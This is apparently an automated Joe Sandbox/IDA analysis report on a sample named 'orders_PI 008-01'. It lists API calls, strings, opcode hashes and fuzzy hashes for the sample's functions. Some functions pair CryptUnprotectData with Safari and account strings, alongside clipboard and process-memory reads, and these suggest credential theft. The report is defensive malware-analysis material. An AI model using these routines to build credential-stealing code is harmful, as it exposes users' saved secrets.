                                          • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@FilePointermemcpy
                                        • String ID:
                                        • API String ID: 609303285-0
                                        • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                        • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                        • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                        • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                        APIs
                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateErrorHandleLastRead
                                        • String ID:
                                        • API String ID: 2136311172-0
                                        • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                        • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                        • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                        • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                        APIs
                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@
                                        • String ID:
                                        • API String ID: 1936579350-0
                                        • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                        • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                        • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                        • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                        • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                        • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                        • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                        • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                        • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                        • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                        • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                        • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                        • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                        APIs
                                        • EmptyClipboard.USER32 ref: 004098EC
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                        • GlobalLock.KERNEL32(00000000), ref: 00409927
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                        • GetLastError.KERNEL32 ref: 0040995D
                                        • CloseHandle.KERNEL32(?), ref: 00409969
                                        • GetLastError.KERNEL32 ref: 00409974
                                        • CloseClipboard.USER32 ref: 0040997D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                        • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                        • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                        • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                        APIs
                                        • EmptyClipboard.USER32 ref: 00409882
                                        • wcslen.MSVCRT ref: 0040988F
                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                        • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                        • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                        • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                        • CloseClipboard.USER32 ref: 004098D7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                        • String ID:
                                        • API String ID: 1213725291-0
                                        • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                        • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                        • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                        • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                        APIs
                                        • GetLastError.KERNEL32 ref: 004182D7
                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                        • LocalFree.KERNEL32(?), ref: 00418342
                                        • free.MSVCRT ref: 00418370
                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                        • String ID: OsError 0x%x (%u)
                                        • API String ID: 2360000266-2664311388
                                        • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                        • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                        • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                        • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                        APIs
                                          • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                          • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                          • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        • OpenClipboard.USER32(?), ref: 00411878
                                        • GetLastError.KERNEL32 ref: 0041188D
                                        • DeleteFileW.KERNEL32(?), ref: 004118AC
                                          • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                          • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                          • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                          • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                          • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                          • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                          • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                          • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                          • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                        • String ID:
                                        • API String ID: 2633007058-0
                                        • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                        • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                        • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                        • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                        • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                        • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                        • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                        APIs
                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: NtdllProc_Window
                                        • String ID:
                                        • API String ID: 4255912815-0
                                        • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                        • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                        • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                        • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 004022A6
                                        • _wcsicmp.MSVCRT ref: 004022D7
                                        • _wcsicmp.MSVCRT ref: 00402305
                                        • _wcsicmp.MSVCRT ref: 00402333
                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                        • memset.MSVCRT ref: 0040265F
                                        • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                          • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                        • API String ID: 2929817778-1134094380
                                        • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                        • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                        • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                        • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                        • String ID: :stringdata$ftp://$http://$https://
                                        • API String ID: 2787044678-1921111777
                                        • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                        • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                        • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                        • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                        • GetWindowRect.USER32(?,?), ref: 00414088
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                        • GetDC.USER32 ref: 004140E3
                                        • wcslen.MSVCRT ref: 00414123
                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                        • ReleaseDC.USER32(?,?), ref: 00414181
                                        • _snwprintf.MSVCRT ref: 00414244
                                        • SetWindowTextW.USER32(?,?), ref: 00414258
                                        • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                        • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                        • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                        • GetClientRect.USER32(?,?), ref: 004142E1
                                        • GetWindowRect.USER32(?,?), ref: 004142EB
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                        • GetClientRect.USER32(?,?), ref: 0041433B
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 2080319088-3046471546
                                        • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                        • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                        • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                        • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                        APIs
                                        • EndDialog.USER32(?,?), ref: 00413221
                                        • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                        • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                        • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                        • memset.MSVCRT ref: 00413292
                                        • memset.MSVCRT ref: 004132B4
                                        • memset.MSVCRT ref: 004132CD
                                        • memset.MSVCRT ref: 004132E1
                                        • memset.MSVCRT ref: 004132FB
                                        • memset.MSVCRT ref: 00413310
                                        • GetCurrentProcess.KERNEL32 ref: 00413318
                                        • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                        • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                        • memset.MSVCRT ref: 004133C0
                                        • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                        • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                        • wcscpy.MSVCRT ref: 0041341F
                                        • _snwprintf.MSVCRT ref: 0041348E
                                        • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                        • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                        • SetFocus.USER32(00000000), ref: 004134B7
                                        Strings
                                        • {Unknown}, xrefs: 004132A6
                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                        • API String ID: 4111938811-1819279800
                                        • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                        • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                        • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                        • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                        • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                        • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                        • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                        • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                        • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                        • SetTextColor.GDI32(?,00C00000), ref: 00401300
